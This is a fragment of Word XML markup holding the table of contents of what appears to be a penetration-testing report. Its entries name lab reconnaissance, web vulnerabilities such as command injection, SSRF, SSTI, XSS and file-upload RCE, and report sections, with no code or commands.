              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="276BA7B7" w14:textId="296B14BD"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2" w:history="1">
            <w:r w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
                <w:noProof/>
              </w:rPr>
              <w:t>5.2.1 reconnaissance and scanning 10.0.2.178</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40</w:t>
            </w:r>
            <w:r w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="680DCFAD" w14:textId="0C075C32"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3" w:history="1">
            <w:r w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
                <w:noProof/>
              </w:rPr>
              <w:t>5.2.2 Enumeration HTTP on 10.0.2.178</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40</w:t>
            </w:r>
            <w:r w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="74E50286" w14:textId="1168B339"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4" w:history="1">
            <w:r w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
                <w:noProof/>
              </w:rPr>
              <w:t>5.2.3 Vulnerability Assessment against 10.0.2.178</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41</w:t>
            </w:r>
            <w:r w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="109ED75A" w14:textId="78B04900"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5" w:history="1">
            <w:r w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
                <w:noProof/>
              </w:rPr>
              <w:t>5.2.4 Exploiting 10.0.2.178</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41</w:t>
            </w:r>
            <w:r w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="38B85729" w14:textId="1DED8727"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6" w:history="1">
            <w:r w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
                <w:noProof/>
              </w:rPr>
              <w:t>5.2.5 Post Exploitation and Privilege Escalation in 10.0.2.178</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42</w:t>
            </w:r>
            <w:r w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="12F493F8" w14:textId="11F74786" w:rsidR="009E02D2" w:rsidRPr="00D77DFE" w:rsidRDefault="009E02D2">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8493"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="majorBidi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc223521127" w:history="1">
            <w:r w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
                <w:noProof/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">5.3 </w:t>
            </w:r>
            <w:r w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
                <w:noProof/>
              </w:rPr>
              <w:t>Vulnerable web app: Web Application RCE and Internal Network Pivoting</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43</w:t>
            </w:r>
            <w:r w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="4BDD3CED" w14:textId="53A8F3C7"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8" w:history="1">
            <w:r w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
                <w:noProof/>
              </w:rPr>
              <w:t>5.3.1 Reconnaissance and enumeration on 10.0.3.190</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43</w:t>
            </w:r>
            <w:r w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="017733E8" w14:textId="139D0904"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29" w:history="1">
            <w:r w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
                <w:noProof/>
              </w:rPr>
              <w:t>5.3.2 Arbitrary File Read via Unsanitized File Parameter</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_Toc223521129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44</w:t>
            </w:r>
            <w:r w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="550EFCA8" w14:textId="0A6F8B44"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30" w:history="1">
            <w:r w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
                <w:noProof/>
              </w:rPr>
              <w:t>5.3.3 DNS Lookup Tool: Command Injection Leading to Remote Shell Access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44</w:t>
            </w:r>
            <w:r w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="3AFFADC5" w14:textId="743E54A4"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31" w:history="1">
            <w:r w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:b/>
                <w:i/>
                <w:noProof/>
              </w:rPr>
              <w:t>5.3.4 Insecure Direct Object Reference (IDOR) in Art Retrieval Function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45</w:t>
            </w:r>
            <w:r w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="7DBA43B7" w14:textId="1642067A"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32" w:history="1">
            <w:r w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
                <w:noProof/>
              </w:rPr>
              <w:t>5.3.5 Server</w:t>
            </w:r>
            <w:r w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
                <w:noProof/>
              </w:rPr>
              <w:noBreakHyphen/>
              <w:t>Side Request Forgery via Unsanitized URL Fetcher Functionality</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45</w:t>
            </w:r>
            <w:r w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="6DC4CBEC" w14:textId="7DFF2333"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lastRenderedPageBreak/>
            <w:t xml:space="preserve">       </w:t>
          </w:r>
          <w:hyperlink w:anchor="_Toc223521133" w:history="1">
            <w:r w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
                <w:noProof/>
              </w:rPr>
              <w:t>5.3.6 Template Renderer Functionality and Server</w:t>
            </w:r>
            <w:r w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
                <w:noProof/>
              </w:rPr>
              <w:noBreakHyphen/>
              <w:t>Side Template Injection (SSTI) Exposure</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46</w:t>
            </w:r>
            <w:r w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="31D01419" w14:textId="3FF6542A" w:rsidR="009E02D2" w:rsidRPr="00D77DFE" w:rsidRDefault="009E02D2">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>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34" w:history="1">
            <w:r w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
                <w:noProof/>
              </w:rPr>
              <w:t>5.3.7 Search Function Input Handling and Reflected Cross</w:t>
            </w:r>
            <w:r w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
                <w:noProof/>
              </w:rPr>
              <w:noBreakHyphen/>
              <w:t>Site Scripting (XSS) Vulnerability</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46</w:t>
            </w:r>
            <w:r w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="169FC433" w14:textId="5A95FA56" w:rsidR="009E02D2" w:rsidRPr="00D77DFE" w:rsidRDefault="009E02D2">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="6151"/>
              <w:tab w:val="right" w:leader="dot" w:pos="8493"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="majorBidi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:r w:rsidRPr="00D77DFE">
            <w:rPr>
              <w:rStyle w:val="Hyperlink"/>
              <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
              <w:noProof/>
            </w:rPr>
            <w:t xml:space="preserve">       </w:t>
          </w:r>
          <w:hyperlink w:anchor="_Toc223521135" w:history="1">
            <w:r w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
                <w:noProof/>
              </w:rPr>
              <w:t>5.3.8 Abusing Unrestricted File Upload for Remote Code Execution and Internal Pivoting</w:t>
            </w:r>
            <w:r w:rsidR="00750FF7" w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t xml:space="preserve">........................................................................................... </w:t>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47</w:t>
            </w:r>
            <w:r w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="0A368616" w14:textId="77B65A30" w:rsidR="009E02D2" w:rsidRPr="00D77DFE" w:rsidRDefault="009E02D2">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8493"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="majorBidi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc223521136" w:history="1">
            <w:r w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
                <w:noProof/>
              </w:rPr>
              <w:t>6. PENETRATION TESTING REPORT</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47</w:t>
            </w:r>
            <w:r w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="68C2BE40" w14:textId="341DEACF" w:rsidR="009E02D2" w:rsidRPr="00D77DFE" w:rsidRDefault="009E02D2">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8493"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="majorBidi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc223521137" w:history="1">
            <w:r w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Business</w:t>
            </w:r>
            <w:r w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:noProof/>
                <w:spacing w:val="-9"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:noProof/>
                <w:spacing w:val="-2"/>
              </w:rPr>
              <w:t>Confidential</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49</w:t>
            </w:r>
            <w:r w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="1209894D" w14:textId="157F20FD" w:rsidR="009E02D2" w:rsidRPr="00D77DFE" w:rsidRDefault="009E02D2">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8493"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="majorBidi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc223521138" w:history="1">
            <w:r w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="Calibri" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:noProof/>
              </w:rPr>
              <w:t>6.1 Confidentiality Statement</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49</w:t>
            </w:r>
            <w:r w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="12E4FF9B" w14:textId="1ACF958E" w:rsidR="009E02D2" w:rsidRPr="00D77DFE" w:rsidRDefault="009E02D2">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8493"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="majorBidi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc223521139" w:history="1">
            <w:r w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:noProof/>
              </w:rPr>
              <w:t>6.2 Disclaimer</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_Toc223521139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50</w:t>
            </w:r>
            <w:r w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="762E8C5C" w14:textId="7B0DDED3" w:rsidR="009E02D2" w:rsidRPr="00D77DFE" w:rsidRDefault="009E02D2">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8493"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="majorBidi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc223521140" w:history="1">
            <w:r w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:noProof/>
              </w:rPr>
              <w:t>6.3 Assessment Overview</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50</w:t>
            </w:r>
            <w:r w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="72CBA852" w14:textId="17528F4A" w:rsidR="009E02D2" w:rsidRPr="00D77DFE" w:rsidRDefault="009E02D2">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8493"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="majorBidi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc223521141" w:history="1">
            <w:r w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:noProof/>
              </w:rPr>
              <w:t>6.4 Assessment Components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50</w:t>
            </w:r>
            <w:r w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="0A053838" w14:textId="720E8256" w:rsidR="009E02D2" w:rsidRPr="00D77DFE" w:rsidRDefault="009E02D2">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8493"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="majorBidi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc223521142" w:history="1">
            <w:r w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:noProof/>
              </w:rPr>
              <w:t>6.5 Executive Summary</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50</w:t>
            </w:r>
            <w:r w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="054A7B83" w14:textId="0C4D9379" w:rsidR="009E02D2" w:rsidRPr="00D77DFE" w:rsidRDefault="009E02D2">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8493"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="majorBidi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc223521143" w:history="1">
            <w:r w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:noProof/>
              </w:rPr>
              <w:t>6.6 Network Topology Overview</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51</w:t>
            </w:r>
            <w:r w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="157108CA" w14:textId="2494DD8A" w:rsidR="009E02D2" w:rsidRPr="00D77DFE" w:rsidRDefault="009E02D2">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8493"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="majorBidi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc223521144" w:history="1">
            <w:r w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:noProof/>
              </w:rPr>
              <w:t>6.7 Scoping and Time Limitations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51</w:t>
            </w:r>
            <w:r w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="2C6AE9B4" w14:textId="7327159E" w:rsidR="009E02D2" w:rsidRPr="00D77DFE" w:rsidRDefault="009E02D2">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8493"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="majorBidi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc223521145" w:history="1">
            <w:r w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:noProof/>
              </w:rPr>
              <w:t>6.8 Testing Summary</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52</w:t>
            </w:r>
            <w:r w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="1C945A56" w14:textId="57B442EF" w:rsidR="009E02D2" w:rsidRPr="00D77DFE" w:rsidRDefault="009E02D2">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8493"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="majorBidi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc223521146" w:history="1">
            <w:r w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:noProof/>
              </w:rPr>
              <w:t>6.9 Tester Notes and Recommendations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_Toc223521146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53</w:t>
            </w:r>
            <w:r w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
